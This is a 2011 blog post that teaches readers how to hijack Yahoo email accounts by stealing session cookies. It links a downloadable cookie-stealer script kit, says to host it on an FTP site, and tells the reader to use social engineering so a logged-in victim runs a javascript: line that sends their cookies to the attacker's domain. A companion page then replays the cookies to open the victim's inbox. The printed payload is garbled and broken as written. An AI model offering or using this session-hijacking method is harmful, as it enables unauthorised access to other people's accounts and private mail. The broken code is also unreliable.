My Blog List

Monday, October 31, 2011

How to Hack Yahoo Accounts By Stealing Session Cookies






WHat are cookies?
A cookie is a small piece of text sent to your browser by a website when you visit. It contains information about your visit that you may want the site to remember. Thesecookies can be stored in your browser.you can see your cookies by typing the following script in your browser.


javascript:alert(document.cookie);                                                     




Session and session IDs:
Whenever we login to our account, our session starts and it will be ended when we press the logout button.i.e the duration between the login and logout can be called as a session.A session ID is a unique number that a Web site's server  assigns a specific user for the duration of that user's visit(session ).




Procedure:
Step 1: Download this Script:




 http://www.ziddu.com/download/16640354/cookiestealerdevz.rar.html


Step:2 Download and extract files into your hard drive.


Step:3 Create a account in any ftp hosting site i suggest
110 mb
rip way
my 3gb
drive hq


  
Step4: Login to your account and upload 4 files into your ftp account.




Step5: Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.[You have to Use social engineering techniques fr this thing to ensure the victim that it is Safe for HIm]
Stolen cookies get stored in directory


'cookies'javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concates(cape(document.cookie)); 


He would again redirected to his yahoo account.


step6. Open the hacked.php . The password is 'explore'.


You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password


NOTE: You can check try this by using two browsers. Take one browser as victim's and the second one as your's.NOTE: It Will Only Work in case of Http

0 comments:

Post a Comment